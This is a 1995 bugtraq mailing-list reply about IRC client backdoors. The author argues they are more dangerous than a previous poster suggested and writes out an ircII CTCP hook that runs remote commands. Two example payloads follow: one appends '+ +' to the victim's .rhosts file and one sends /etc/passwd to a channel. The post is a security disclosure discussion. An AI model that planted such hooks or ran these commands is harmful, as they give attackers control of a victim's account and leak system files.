[893] in bugtraq
Re: IRC Security Loophole
daemon@ATHENA.MIT.EDU (Kernel Panic)
Fri Feb 3 22:34:34 1995
Date: Fri, 3 Feb 1995 18:30:53 -0800 (PST)
From: Kernel Panic <lwells@netcom.com>
To: Silicon Avatar <zitz@infinity.ivdev.com>
Cc: bugtraq@fc.net
In-Reply-To: <Pine.LNX.3.91.950203181914.147A-100000@infinity.ivdev.com>
On Fri, 3 Feb 1995, Silicon Avatar wrote:
> On Fri, 3 Feb 1995, Lorna Leong wrote:
>
> >
> > Hi,
> >
> > I read somewhere that there is a security loophole in IRC. I don't know
> > anything else about it but I would like to find out more information
> > about this. I heard that information about this IRC loophole can be found
> > by FTP at ftp.cert.org, but I couldn't find anything relevant there.
>
> If you are talking about the "jupe" or "grok" hole. It was temporary, and
> merely hacked version of the client floating around at "trusted" sites.
>
> To my knowledge, these "hacks" have been removed and are no longer a threat
> (unless someone is propogating these older clients.)
>
> Simply put, you could "CTCP grok [command]" (CTCP being a method of
> communication over IRC) someone, and have that command executed,
> unknowingly, off the account.
No, IRC holes are a more serious threat than you give then credit for.
For example, if I were to add to a script (or better yet make someone
type) the following:
/on ^ctcp "% % JUPE" $3-
They would be just as much in my control as if they were on a hacked client.
from this, you can do:
/ctcp <nick> JUPE /exec echo + + >> $HOME/.rhosts
or
/ctcp <nick> JUPE /red #<channel> /exec cat /etc/passwd
Theres more to IRC backdoors than making people say stupid stuff on a
channel. I hope this example clears that up a little.
/dev/kmem
-
This sig deleted for brevity
-
